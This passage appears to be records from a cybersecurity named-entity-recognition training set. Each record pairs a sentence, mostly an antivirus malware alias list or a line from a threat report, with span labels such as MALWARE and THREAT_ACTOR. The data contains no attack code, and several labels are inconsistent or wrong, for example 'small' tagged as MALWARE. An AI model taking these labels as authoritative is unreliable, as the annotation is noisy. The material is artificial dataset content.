{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003497", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.DebrisB.Worm Trojan/W32.Csyr.3584.C Worm.Win32.Debris!O W32/Csyr.A!Eldorado Win32/Tnega.FeZbcZD WORM_GAMARUE.SMB Win.Adware.Downware-239 Worm.Win32.Debris.p Trojan.Win32.Drop.brprwz Worm.Win32.Bundpil.T Trojan.MulDrop4.25343 WORM_GAMARUE.SMB BehavesLike.Win32.Worm.zz W32/Csyr.A!Eldorado Trojan/Csyr.a TR/Zusy.358421 Trojan/Win32.Csyr Trojan.Zusy.DA717 Worm.Gamarue Worm.Win32.Debris.p Trojan:Win32/Topini.A Worm/Win32.Bundpil.R63957 Worm.Gamarue Trj/Zbot.M Trojan.Win32.Csyr.A W32/Bundpil.T!worm Worm.Win32.Gamarue.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003498", "source": "cyner2_train"}} {"text": "A backdoor also known as: RemoteAdmin.Win32.eSurveiller!O Trojan.VB.Win32.68501 Trojan/VB.nqz TSPY_ESURVEILLER_DC07000D.UVPA Spyware.ESurveiller TSPY_ESURVEILLER_DC07000D.UVPA Win.Trojan.Infostealer-5 Backdoor.Win32.VB.ppb 
Trojan.Win32.Dwn.ssuio Trojan.Win32.VB.1452000 Troj.Infostealer.lDrj Trojan.DownLoader1.64229 not-a-virus:RemoteAdmin.Win32.eSurveiller Trojan.Strictor.D2473 Backdoor.Win32.VB.ppb Unwanted/Win32.Radmin.R25253 Backdoor.VB Trj/CI.A Trojan.Infostealer Win32.Backdoor.Vb.Lnns Trojan.DownLoader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003500", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Delf.Inject.Z Trojan-Dropper.Win32.Mudrop!O Hacktool.Passview Trojan.Delf.Inject.Z Trojan/Dropper.Mudrop.ew TROJ_DROPPER.HVW Win32.Worm.AutoRun.ij W32/Risk.BDUN-6545 TROJ_DROPPER.HVW Win.Trojan.Delf-3744 Trojan.Delf.Inject.Z Trojan-Dropper.Win32.Mudrop.ew Trojan.Delf.Inject.Z Trojan.Win32.Mudrop.crqisw Trojan.Win32.MulDrop.1431634 Trojan.Delf.Inject.Z TrojWare.Win32.TrojanDropper.Mudrop.~RA Trojan.Delf.Inject.Z Trojan.MulDrop.12722 Dropper.Mudrop.Win32.77 BehavesLike.Win32.PUP.tc W32/Dropper.GWJ TrojanDropper.Mudrop.fy TR/Spy.Ftput.C Trojan[PSW]/Win32.LdPinch Trojan.Delf.Inject.Z Trojan-Dropper.Win32.Mudrop.ew PWS:Win32/Sounli.A Dropper/Win32.Mudrop.C138252 TrojanPSW.Pinch Trojan.PWS.LdPinch!Csxdj/6mZgk Trojan-Dropper.Win32.Mudrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003502", "source": "cyner2_train"}} {"text": "RedLine Stealer's evasive spear-phishing campaign targets the hospitality industry.", "spans": {"THREAT_ACTOR: RedLine Stealer's": [[0, 17]], "THREAT_ACTOR: spear-phishing campaign": [[26, 49]], "ORGANIZATION: the hospitality industry.": [[58, 83]]}, "info": {"id": "cyner2_train_003503", "source": "cyner2_train"}} {"text": "Web application vulnerabilities are like doorways: you never know who or what will walk through.", "spans": {"VULNERABILITY: Web application vulnerabilities": [[0, 31]]}, "info": {"id": "cyner2_train_003504", "source": "cyner2_train"}} {"text": "Threat actors with strategic interest in the affairs of other governments and civil society organizations have been 
launching targeted exploitation campaigns for years.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "ORGANIZATION: governments": [[62, 73]], "ORGANIZATION: civil society organizations": [[78, 105]], "THREAT_ACTOR: exploitation campaigns": [[135, 157]]}, "info": {"id": "cyner2_train_003505", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9984 TR/AD.Corinrat.sejyy Trojan.Application.MSILPerseus.D535 Ransom:MSIL/PentagonRat.A Trj/GdSda.A Win32/Application.478", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003506", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Win32.VBKrypt.3!O Trojan.Vbot.S15507 Downloader.VB.Win32.107566 Trojan/AntiAV.out Win32.Trojan.WisdomEyes.16070401.9500.9933 Trojan.Win32.AntiAV.cqff Trojan.Win32.AntiAV.bbnaxd Trojan.MulDrop3.35749 Trojan.AntiAV.abe TR/Offend.7084277.1 Trojan:Win32/Vbot.T Trojan.Win32.AntiAV.cqff Downloader/Win32.VB.C136965 Trojan.AntiAV Win32.Trojan.Antiav.Wmiq Trojan.AntiAV!kRLKkhVQepY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003508", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.RazyNHmA.Trojan Trojan.Waldek Trojan.Symmi.D100C4 WORM_HPKASIDET.SM0 Win32.Trojan.Kryptik.aio WORM_HPKASIDET.SM0 Win.Trojan.Betabot-5 Trojan.Win32.NgrBot.evigbp BackDoor.IRC.NgrBot.566 BehavesLike.Win32.MultiPlug.cm W32/Trojan.HZWF-1490 TR/Crypt.Xpack.tsufk Trojan:Win32/Radonskra.B Trojan/Win32.Upbot.C1483736 Trj/GdSda.A Trojan-Ransom.Raa W32/Kryptik.FACF!tr Win32/Trojan.a93", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003509", "source": "cyner2_train"}} {"text": "Attackers are continually trying to find new ways to target users with malware sent via email.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: users": [[60, 65]], "MALWARE: malware": [[71, 78]]}, "info": {"id": "cyner2_train_003510", "source": "cyner2_train"}} {"text": "A backdoor 
also known as: Trojan.Multi Win32.Trojan.WisdomEyes.16070401.9500.9999 Zum.Rastarby.4 Trojan.Win32.Miner.tfkd Zum.Rastarby.4 Riskware.Win64.BtcMine.dugwfh Uds.Dangerousobject.Multi!c Win32.Trojan.Miner.Dux BehavesLike.Win32.AdwareLinkury.tc Zum.Rastarby.4 Trojan.Win32.Miner.tfkd Trojan:Win64/HelaMiner.A Trojan.Miner BAT/CoinMiner.YJ Trj/CI.A Win32/Trojan.769", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003512", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.ZXShell BKDR_ZXSHELL.D Backdoor.Win32.ZXShell.v Backdoor.W32.Zxshell!c BKDR_ZXSHELL.D BDS/ZXShell.999712 W32/ZxShell.D!tr Trojan.Kazy.DB0C8D Backdoor:Win32/Zxshell.A!dha Backdoor/Win32.ZXShell.N1663696022 Win32.Backdoor.Zxshell.Pfjm Trojan.Win32.Zxshell Win32/Backdoor.6e4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003514", "source": "cyner2_train"}} {"text": "the worm was back, and it was both more and less effective.", "spans": {"MALWARE: worm": [[4, 8]]}, "info": {"id": "cyner2_train_003515", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BitCoinMiner Riskware.Win32.BtcMine.exrhsn Trojan.Win32.Z.Strictor.1934848 Win32.Trojan.Strictor.Akpc Tool.BtcMine.982 BehavesLike.Win32.BadFile.tc Trojan.Win32.CoinMiner TR/CoinMiner.vctqx Trojan.Strictor.D2613C Trojan.Win64.BitCoinMiner W32/CoinMiner.AZU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003516", "source": "cyner2_train"}} {"text": "The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim's system regardless whether macros are enabled.", "spans": {"SYSTEM: DDE": [[11, 14]], "SYSTEM: PowerShell": [[20, 30]], "THREAT_ACTOR: attacker": [[41, 49]], "SYSTEM: a victim's system": [[79, 96]], "MALWARE: macros": [[116, 122]]}, "info": {"id": "cyner2_train_003517", "source": "cyner2_train"}} {"text": "In addition to Chipotle, the hackers appears to be targeting national restaurant franchises Baja Fresh 
and Ruby Tuesday, according to malware samples and other evidence CyberScoop obtained.", "spans": {"ORGANIZATION: Chipotle,": [[15, 24]], "THREAT_ACTOR: hackers": [[29, 36]], "ORGANIZATION: national restaurant franchises Baja Fresh and Ruby Tuesday,": [[61, 120]], "MALWARE: malware": [[134, 141]], "ORGANIZATION: CyberScoop": [[169, 179]]}, "info": {"id": "cyner2_train_003519", "source": "cyner2_train"}} {"text": "ThreatLabz has determined that Nevada shares significant code with the Rust-based variant of Nokoyawa.", "spans": {"ORGANIZATION: ThreatLabz": [[0, 10]], "MALWARE: Nevada": [[31, 37]], "MALWARE: the Rust-based variant of Nokoyawa.": [[67, 102]]}, "info": {"id": "cyner2_train_003520", "source": "cyner2_train"}} {"text": "This past week, our team has identified a group of malware samples that matched behavioral heuristics for multiple known malware families.", "spans": {"ORGANIZATION: team": [[20, 24]], "MALWARE: group of malware": [[42, 58]], "MALWARE: malware families.": [[121, 138]]}, "info": {"id": "cyner2_train_003521", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ShellKillUnixOSPtv.Worm Trojan.Script.BXM Trojan.VBS.Kofornix.A Trojan.KillDisk.MBR Troj.W32.EraseMBR.d!c Trojan.Jokra Win32/DarkSeoul.AA UNIX_KILLMBR.A Trojan.Win32.EraseMBR.d Trojan.Script.BXM Trojan.Script.EraseMBR.bxxrlr Trojan.Script.BXM Trojan.Script.BXM Trojan.KillMBR.168 BASH/Kast.A!tr Trojan.Script.BXM Trojan.Win32.EraseMBR.d Trojan:SH/Kofornix.A Trojan.SH.KilMBR Win32.Trojan.Erasembr.Wtnk Trojan.Win32.EraseMBR Trojan.Script.BXM Win32/Trojan.6f6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003522", "source": "cyner2_train"}} {"text": "A backdoor also known as: I-Worm.Plesa.r3 Trojan/Plesa.a IRC-Worm.Plesa!VraGnsrR3Es W32/Plesa.A@p2p W32.SillyP2P IRC/Plesa.A WORM_PLESA.B Worm.IRC.Plesa.A IRC-Worm.Win32.Plesa.a Trojan.Win32.Plesa.fuyf Worm.Win32.A.IRC-Plesa.34304[h] Worm.IRC.Plesa.A Win32.HLLW.Plesa Worm.Plesa.Win32.1 WORM_PLESA.B 
BehavesLike.Win32.Sality.nc W32/Plesa.BXPQ-5568 I-Worm/Plesa.a WORM/Irc.Plesa.A.2 W32/Plesa.A!worm.irc Worm[IRC]/Win32.Plesa W32.W.Plesa.a!c Win32/Plesa.worm.34304 Worm:Win32/Plesa.A Win32.Worm-irc.Plesa.Svqx IRC-Worm/Plesa.A Worm.Win32.Plesa.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003526", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Spybot.Worm W32/Packed_Packman.A Virus.Win32.Heur.c Backdoor.Rbot!IK Win32.HLLW.MyBot.based Backdoor.Rbot BackDoor.RBot.IA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003527", "source": "cyner2_train"}} {"text": "In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[13, 39]], "MALWARE: small": [[53, 58]], "THREAT_ACTOR: phishing campaign": [[68, 85]], "ORGANIZATION: a government organization.": [[95, 121]]}, "info": {"id": "cyner2_train_003529", "source": "cyner2_train"}} {"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists, human rights defenders, trade unions and labour rights activists, many of whom are seemingly involved in the issue of migrants' rights in Qatar and Nepal.", "spans": {"THREAT_ACTOR: well-engineered campaign": [[36, 60]], "ORGANIZATION: journalists, human rights defenders, trade unions": [[148, 197]], "ORGANIZATION: labour rights activists,": [[202, 226]]}, "info": {"id": "cyner2_train_003533", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.2.4.6 Trojan.Win32.Coced.bhwfkh Hacktool.PWSteal Naebi.246 Trojan-PSW.Win32.Coced.246 Trojan.PWS.Coced!FBVVvUBVA1M Trojan.PWS.Coced.2.4.6 TrojWare.Win32.PSW.Coced.246 Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.246 Trojan.Coced.Win32.158 W32/Risk.HJYL-5906 Trojan/PSW.Coced.246 
TR/PSW.Coced.246 Trojan[PSW]/Win32.Coced Win32.PSWTroj.Coced.kcloud PWS:Win32/Coced.2_46 Win-Trojan/Coced.19456 Trojan.PWS.Coced.2.4.6 Trojan.PWS.Coced.2.4.6 TrojanPSW.Coced Win32/PSW.Coced.246 Win32.Init.QQRob.dkwv W32/Coced.246!tr.pws PSW.Coced Trojan.Win32.InfoStealer.AYJO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003534", "source": "cyner2_train"}} {"text": "Some of the new 2014-2015 Duqu infections are linked to the P5+1 events and venues related to the negotiations with Iran about a nuclear deal.", "spans": {"MALWARE: Duqu infections": [[26, 41]]}, "info": {"id": "cyner2_train_003536", "source": "cyner2_train"}} {"text": "This latest attack potentially materially impacts one of the primary countermeasures employed against wiper attacks: Virtual Desktop Interface snapshots.", "spans": {"MALWARE: wiper": [[102, 107]], "SYSTEM: Virtual Desktop Interface snapshots.": [[117, 153]]}, "info": {"id": "cyner2_train_003538", "source": "cyner2_train"}} {"text": "One is CVE-2012-1856, reinvigorated with a novel ROP chain to bypass ASLR and deliver the uWarrior payload.", "spans": {"MALWARE: uWarrior payload.": [[90, 107]]}, "info": {"id": "cyner2_train_003539", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packer.YodaBased.B Packer.YodaBased.B Packer.YodaBased.B Win32.Trojan.WisdomEyes.16070401.9500.9994 Packer.YodaBased.B Trojan.Win32.AutoRun.omxo Packer.YodaBased.B Packed.Win32.Klone.~KE Packer.YodaBased.B BackDoor.Attacker BehavesLike.Win32.Downloader.pc Backdoor.Win32.Hupigon Trojan/PSW.GamePass.msl TrojanDownloader:Win32/Murka.A Worm.Win32.Autorun.45568.I Packer.YodaBased.B TScope.Malware-Cryptor.SB Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003540", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader-72360 Adware.BDSearch.1 Trojan.DownLoad.40686 Win32/Jhee.H Adware.Rugo Trojan:Win32/Jhee.G Adware.BDSearch.1 Adware.WSearch.O Trj/CI.A", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003541", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodfa8.Trojan.1d71 Trojan.Keylogger.NAD Trojan.Tuma.r4 Trojan.Keylogger.NAD Trojan/Spy.oop Trojan.Keylogger.NAD backdoor.win32.hupigon.fn W32/Trojan3.KYS Trojan.Win32.Tuma.deaiow Trojan.Win32.Z.Keylogger.20480.K[h] Troj.Keylogger.Nad!c Trojan.Keylogger.NAD Trojan.Keylogger.NAD Trojan.Keylogger.Win32.35586 W32/Trojan.GLTF-2077 TR/Tuma.A W32/Keylog.A!tr.spy Trojan.Keylogger.NAD Trojan:Win32/Tuma.A TrojanSpy.KeyLogger!6zo304KOTCM Trojan.Win32.Spy Trojan.Keylogger.NAD PSW.KeyLogger.CUC Win32/Trojan.Keylog.761", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003543", "source": "cyner2_train"}} {"text": "In the last month Trustwave was engaged by two separate hospitality clients, and one restaurant chain for investigations by an unknown attacker or attackers.", "spans": {"ORGANIZATION: Trustwave": [[18, 27]], "ORGANIZATION: hospitality clients,": [[56, 76]], "ORGANIZATION: restaurant chain": [[85, 101]], "THREAT_ACTOR: an unknown attacker": [[124, 143]], "THREAT_ACTOR: attackers.": [[147, 157]]}, "info": {"id": "cyner2_train_003544", "source": "cyner2_train"}} {"text": "Malware writers have always sought to develop feature-rich, easy to use tools that are also somewhat hard to detect via both host- and network-based detection systems.", "spans": {"THREAT_ACTOR: Malware writers": [[0, 15]], "MALWARE: tools": [[72, 77]], "SYSTEM: host-": [[125, 130]], "SYSTEM: network-based detection systems.": [[135, 167]]}, "info": {"id": "cyner2_train_003545", "source": "cyner2_train"}} {"text": "Unit 42 researchers recently observed an unusually clever spambot's attempts to increase delivery efficacy by abusing reputation blacklist service APIs. 
Rather than sending spam as soon as the host is infected, the bot checks common blacklists to confirm its e-mails will actually be delivered, and if not, shuts itself down.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "VULNERABILITY: abusing reputation blacklist service APIs.": [[110, 152]], "SYSTEM: host": [[193, 197]], "MALWARE: bot": [[215, 218]]}, "info": {"id": "cyner2_train_003546", "source": "cyner2_train"}} {"text": "Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at multiple targets in the Middle East.", "spans": {"ORGANIZATION: Kaspersky Lab": [[28, 41]]}, "info": {"id": "cyner2_train_003547", "source": "cyner2_train"}} {"text": "No traces were left on affected systems apart from files from the exploit process if the target machine wasn't interesting to the Lurk operators.", "spans": {"SYSTEM: affected systems": [[23, 39]], "VULNERABILITY: the exploit process": [[62, 81]], "SYSTEM: machine": [[96, 103]], "THREAT_ACTOR: the Lurk operators.": [[126, 145]]}, "info": {"id": "cyner2_train_003549", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.Disfa.hfpj.FC.4367 Win32.Trojan.WisdomEyes.16070401.9500.9998 Exploit.Win32.Strictor.etpuwg Win32.Trojan.Fakedoc.Auto Trojan.Injector.Win32.565843 W32/Trojan.BKGU-8860 Trojan.Strictor.D1A871 Ransom.HiddenTear Trojan.Injector!WLrriQRdMeM Trj/GdSda.A Win32/Trojan.97a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003550", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.JS.Downloader.IDO Trojan.Downloader.JS.3612 Trojan.JS.Downloader.IDO Trojan.Malscript!html JS_BADRABBIT.A Trojan.JS.Downloader.IDO Js.Trojan.Js.Wrgf Trojan.JS.Downloader.IDO JS_BADRABBIT.A Trojan.FLCY-1 TrojanDownloader:JS/Tibbar.A Trojan.JS.Downloader.IDO Trojan.JS.Downloader.IDO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003551", "source": "cyner2_train"}} {"text": "FireEye has moderate 
confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: campaign": [[39, 47]], "ORGANIZATION: hospitality sector": [[62, 80]], "THREAT_ACTOR: Russian actor APT28.": [[98, 118]]}, "info": {"id": "cyner2_train_003552", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Adware.Virtumonde Win32/Adware.Virtumonde Trojan:Win32/Iceroe.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003553", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_JORIK_0000023.TOMA Trojan.Win32.Snojan.gi Trojan.Win32.Autoruner1.wcikr MULDROP.Trojan BehavesLike.Win32.Downloader.mz Trojan/Win32.FirstInj TrojanDownloader:Win32/Bleyr.A Trojan.Zusy.D8B2B Win-Trojan/Patched.25600.B BScope.Trojan.SvcHorse.01643 Win32/AntiAV.NIA Trojan.FirstInj!zbN/akDwH70 Trojan.Win32.Jorik W32/FirstInj.KAP!tr.bdr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003554", "source": "cyner2_train"}} {"text": "A backdoor also known as: MSIL.Trojan.Kryptik.k W32/Trojan.IINR-0738 BehavesLike.Win32.Trojan.vc Trojan:Win32/Gielclas.A!gfc Trj/CI.A Trojan.Injector!QI3sWN009L0 Trojan.MSIL.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003555", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Trojan.Win32.BQHK0411.dfyyqz Uds.Dangerousobject.Multi!c Win32.Trojan.Strictor.Wvar Trojan.Strictor.DCD3E SpamTool.Skype! 
MSIL/SpamTool_Skype.L!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003556", "source": "cyner2_train"}} {"text": "A backdoor also known as: Email-Worm.Win32!O Happy99.Worm W32/Ska.exe.worm Win32.Trojan.WisdomEyes.16070401.9500.9919 Happy99.Worm Win32/Happy99.10000!Dropper Win.Trojan.Happy99-2 Email-Worm.Win32.Happy Win95.Spanska.10000 TR/Happy.69 Trojan.Heur.E705EC Email-Worm.Win32.Happy Worm:Win32/Ska.A@m Win32.Worm-email.Happy.Wrqu Win32.Ska.A Email-Worm.Win32.Happy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003557", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Nabony.AP3 Worm.AutoRun Trojan.Heur.PT.EEF50D Win32.Trojan.WisdomEyes.16070401.9500.9996 W32.SillyFDC Win32/Xema.H TSPY_AUTORUN_BJ022DBF.TOMC Win.Worm.Autorun-8605 Trojan.Win32.MLW.rupxe Win32.Worm.Autorun.Akyt Worm.Win32.Nabony.A TSPY_AUTORUN_BJ022DBF.TOMC BehavesLike.Win32.Dropper.cz WORM/Autorun.YD Worm:Win32/Nabony.A Trojan.Win32.A.Scar.1183299 Trojan/Win32.HDC.C12022 Hoax.Blocker W32/AutoRun.YD!tr Win32/Worm.0fe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003562", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9988 MSIL/Filecoder.FF Ransom_Vortex.R004C0DKT17 Trojan.Win32.Filecoder.evqvnb Ransom_Vortex.R004C0DKT17 BehavesLike.Win32.Trojan.nc W32/Trojan.METU-7441 TrojanSpy.MSIL.nar TR/Dropper.MSIL.bpldq MSIL/Filecoder.FF!tr Ransom:MSIL/Vortex.A Trojan/Win32.Ransomlock.C2275506 Trojan.Ransom.Vortex Ransom.Vortex Trojan-Ransom.FileCoder Trj/GdSda.A Win32/Trojan.Dropper.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003563", "source": "cyner2_train"}} {"text": "In the era of APT's, it feels like something is amiss when there is a forum of governments and no malware arises.", "spans": {"THREAT_ACTOR: APT's,": [[14, 20]], "ORGANIZATION: governments": [[79, 90]], "MALWARE: malware": [[98, 105]]}, 
"info": {"id": "cyner2_train_003564", "source": "cyner2_train"}} {"text": "Ursnif is a data stealer and a downloader with a lot of abilities to steal data from installed browsers and other applications such as Microsoft Outlook.", "spans": {"MALWARE: Ursnif": [[0, 6]], "MALWARE: data stealer": [[12, 24]], "MALWARE: downloader": [[31, 41]], "VULNERABILITY: installed browsers": [[85, 103]], "SYSTEM: Microsoft Outlook.": [[135, 153]]}, "info": {"id": "cyner2_train_003566", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanpws.Trah Trojan[PSW]/Win32.Trah PWS:Win32/Trah.B PUA.DealPly.Da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003567", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Chepdu.R Troj.W32.BHO.liE5 Win32.Trojan.WisdomEyes.16070401.9500.9828 TrojWare.Win32.BHO.SC Win32.HLLW.Lime.2312 BehavesLike.Win32.BadFile.dm Trojan-Downloader.Win32.Banload TR/Chepdu.IA Trojan.Graftor.D1A2F Trojan:Win32/Comquab.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003568", "source": "cyner2_train"}} {"text": "It was only a matter of time, however, for other cybercriminals to follow suit.", "spans": {"THREAT_ACTOR: cybercriminals": [[49, 63]]}, "info": {"id": "cyner2_train_003569", "source": "cyner2_train"}} {"text": "In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.", "spans": {"MALWARE: threat": [[49, 55]], "SYSTEM: system": [[67, 73]]}, "info": {"id": "cyner2_train_003572", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.DoS.119296 DoS.Win32.Nenet Trojan.Win32.Nenet.dinmxr Backdoor.W32.Singu.lhbk FDOS.Nenet.32768 Tool.Win32.69ACF863 Backdoor.Win32.Rbot DDOS/Nenet.A DoS.Win32.Nenet DoS.Nenet DoS/Nenet.B Win32/Virus.DDoS.672", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003573", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: Trojan.Icbot.FC.848 Troj.Spy.Msil.Keylogger!c Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan-Spy.MSIL.Keylogger.cfle Trojan.Win32.IRCBot.efyfpt TrojWare.MSIL.IRCBOT.B Trojan.MSIL.IRCBot TrojanSpy.MSIL.usk MSIL/IRCBot.BK!tr Trojan[Spy]/MSIL.IrcGhost Trojan.Razy.DFC68 Trojan.Win32.Z.Ircbot.77312.A Trojan-Spy.MSIL.Keylogger.cfle Trojan:MSIL/Icbot.A!bit Msil.Trojan-spy.Keylogger.Hssn TrojanSpy.Keylogger!yn+qYVv4uIw Trj/GdSda.A Win32/Trojan.Spy.00e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003575", "source": "cyner2_train"}} {"text": "Despite global efforts to detect and disrupt the distribution of CryptoWall, adversaries have continued to innovate and evolve their craft, leading to the release of CryptoWall 4.", "spans": {"THREAT_ACTOR: CryptoWall, adversaries": [[65, 88]], "MALWARE: CryptoWall 4.": [[166, 179]]}, "info": {"id": "cyner2_train_003576", "source": "cyner2_train"}} {"text": "In its most recent campaign, Tick employed spear-phishing emails and compromised a number of Japanese websites in order to infect a new wave of victims.", "spans": {"THREAT_ACTOR: campaign,": [[19, 28]], "THREAT_ACTOR: Tick": [[29, 33]], "THREAT_ACTOR: spear-phishing emails": [[43, 64]]}, "info": {"id": "cyner2_train_003577", "source": "cyner2_train"}} {"text": "We named the attack BITTER based on the network communication header used by the latest variant of remote access tool RAT used.", "spans": {"MALWARE: variant": [[88, 95]], "MALWARE: remote access tool RAT": [[99, 121]]}, "info": {"id": "cyner2_train_003580", "source": "cyner2_train"}} {"text": "Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand.", "spans": {"SYSTEM: compromised systems": [[12, 31]], "MALWARE: Bookworm": [[56, 64]]}, "info": {"id": "cyner2_train_003582", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojanpws.Mimikatz Win32.Trojan.WisdomEyes.16070401.9500.9886 Trojan.Win32.Mimikatz.eoptjl Troj.Psw.W32.Mimikatz!c BehavesLike.Win32.PUPXAB.jh W32/Application.SMPV-5402 Trojan.PSW.Mimikatz.sw Trojan[PSW]/Win32.Mimikatz Application.Mimikatz.2 HackTool:Win32/WDigest.A Trj/GdSda.A Win32.Trojan-qqpass.Qqrob.Eaxn hacktool.mimikatz Win32/Application.IM.f6f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003584", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Banker.Win32.BestaFera.annq Trojan.Win32.Demp.bozwca BehavesLike.Win32.Injector.th TR/Avgesi.B.1 Trojan:Win32/Avgesi.B Trojan-Banker.Win32.BestaFera.annq Win32.Trojan-dropper.Demp.Lnxz Trojan-Downloader.Win32.Pher W32/Demp.PJN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003587", "source": "cyner2_train"}} {"text": "While the malware attack has not been exclusively targeting the region, it has been focusing on the South Korean manufacturing industry.", "spans": {"ORGANIZATION: manufacturing industry.": [[113, 136]]}, "info": {"id": "cyner2_train_003588", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.C0FB Trojan.Dovs TSPY_EMOTET.AUSYYON Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Emotet TSPY_EMOTET.AUSYYON Win.Trojan.Emotet-6410462-0 Win32.Trojan-Spy.Emotet.IT Trojan.Win32.Dovs.esh Trojan.Win32.Dovs.ewnrtt Troj.W32.Dovs!c BehavesLike.Win32.PWSZbot.cc W32.Trojan.Emotet TR/Crypt.ZPACK.sbdbq Trojan/Win32.Dovs Trojan.Win32.Dovs.esh Trojan/Win32.Emotet.R216875 Trojan.Emotet Trj/RnkBend.A Win32.Trojan.Dovs.Szuw Trojan.Win32.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003589", "source": "cyner2_train"}} {"text": "Today, we are looking at an exploit kit that we have not seen before.", "spans": {"MALWARE: exploit kit": [[28, 39]]}, "info": {"id": "cyner2_train_003591", "source": "cyner2_train"}} {"text": "This vulnerability is mostly known as SambaCry after the famous WannaCry 
